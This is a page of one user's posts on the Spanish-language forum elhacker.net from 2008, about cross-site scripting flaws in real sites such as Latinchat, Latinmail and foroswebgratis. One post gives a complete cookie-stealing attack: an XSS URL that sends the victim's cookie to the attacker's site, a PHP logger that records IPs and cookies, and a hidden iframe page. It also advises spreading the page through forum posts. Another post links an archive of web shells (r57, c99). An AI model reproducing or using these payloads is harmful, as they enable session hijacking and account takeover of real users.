elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24]
231  Seguridad Informática / Nivel Web / Re: Bug Latinchat en: 21 Febrero 2008, 03:25 am
no se seguire invstigando a ver si le saco provecho.saludos!
232  Seguridad Informática / Nivel Web / Re: Bug Latinchat en: 20 Febrero 2008, 16:41 pm
se puede ejecutar vbs o javascript por ejemplo <script>document.location='lala.js'</script> mm no se que màs se puede hacer remoto ..
yo habia encontrado esto

http://foro.elhacker.net/index.php/topic,197376.0.html
233  Seguridad Informática / Nivel Web / Re: Bug Latinchat en: 20 Febrero 2008, 05:09 am
Latinchat XSS

imagen:

http://img204.¡mageshack.us/img204/4500/43171804ii3.jpg


Input vulnerable 'UserName'

http://login04.latinchat.com/magma_qa/templates/modules/result/T2.php?UserName=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E&InstanceID=R31_1-1

--------------------------------------------------------------------------------------------------------------------------------------------------------------
Latin mail
http://img254.¡mageshack.us/img254/2719/pantallazo1xp1.png


http://www.latinmail.com/nousuario.php?domain=%3Cimg%20src=http:%20onerror=alert(String.fromCharCode(88,83,83))%20/%3E

------------------------------------------------------------------

ventana de chat

Código:
http://img411.¡mageshack.us/img411/7/dibujoaz4.jpg
Código:
http://img411.¡mageshack.us/img411/2485/dibujozr6.jpg

234  Seguridad Informática / Nivel Web / Re: Bug Latinchat en: 18 Febrero 2008, 00:46 am
Desmostrcion? no perdere tiempo en subir imagenes pero si podes ir a una sala de latinchat y donde escribis el mensaje pones <img src="URL"> y mostrara la imagen.
235  Seguridad Informática / Nivel Web / Re: Bug Latinchat en: 16 Febrero 2008, 16:31 pm
si .. la verdad que tmb conozco uno quizas sea el mismo .. se puede meter codigo en la ventana de chat .. quizas sea explotable. me pondre a ver que encuentro.yo pensaba que tenia html injection pero al final no le llegaba mi codigo al resto asi que me olvide.

salu2!
236  Seguridad Informática / Nivel Web / Re: [XSS] foroswebgratis en: 29 Enero 2008, 22:29 pm
woow! la verdad que me sirvio ese aporte.
237  Seguridad Informática / Nivel Web / Re: WordPress Last Referers HTML INJECTION Proof of Concept en: 28 Enero 2008, 14:37 pm
la verdad que si funciona!..pero que version? más datos exactamente.
238  Seguridad Informática / Nivel Web / [XSS] foroswebgratis en: 28 Enero 2008, 03:52 am
en realidad el xss esta de hace bastante tiempo..siempre sta web tuvo multiples vulnerabilidades..la primero vez que encontre uno fue solo de accidente en el panel de administracion del foro ejempl: yo era admin-Foro.php?id_foro=1 cambia por 2 y ya estaba en la cuenta del foro numero 2..luego lo repararon..al poco tiempo habia encontrado otro..donde se podian borrar foros asi de la nada con solo dar click en un enlace..tmb lo arreglaron..y bue ahora este xss.

el error esta en el buscador de la web  "home-buscador-run.php"

link:

Código:
http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />


y aqui la tabla para encodearla:
son los de la columna code..


http://ttssh2.sourceforge.jp/manual/en/macro/appendixes/ascii.html

la web encodeada quedaria asi: http://www.misitio.com/s.php?c=

grabador de cookies(s.php):

Código:
<?php
 $cookie = $_GET['c'];
 $ip = getenv ('REMOTE_ADDR');
 $date=date("m/d/Y g:i:s a");
 $referer=getenv ('HTTP_REFERER');
 $fl = fopen('log.txt', 'a');
 fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n");
 fclose($fl);
?>


index.htm

Código:
<iframe width="1" height="1" src="http://www.foroswebgratis.com/home-buscador-run.php?buscar=<img src=http: onerror=h=String.fromCharCode(**tu web encodeada**);document.location=h.concat(document.cookie) />" scrolling="no" name="hola" align="middle" border="0" frameborder="0">

y listo solo le mandas la web donde tengo el codigo de index.htm a la victima y robara su cookie.(tiene q estar logueada).lo ideal es ponerla como post en algun foro.

saludos!

239  Seguridad Informática / Nivel Web / Re: shell para rfi en: 28 Enero 2008, 03:16 am
aca te dejo un rar con 66/67 shell no me acuerdo..estan la r57 la c99 entre otras..muy buena colección http://rapidshare.com/files/87180324/todas_las_shell.rar.html
Páginas: 1 ... 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 [24]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines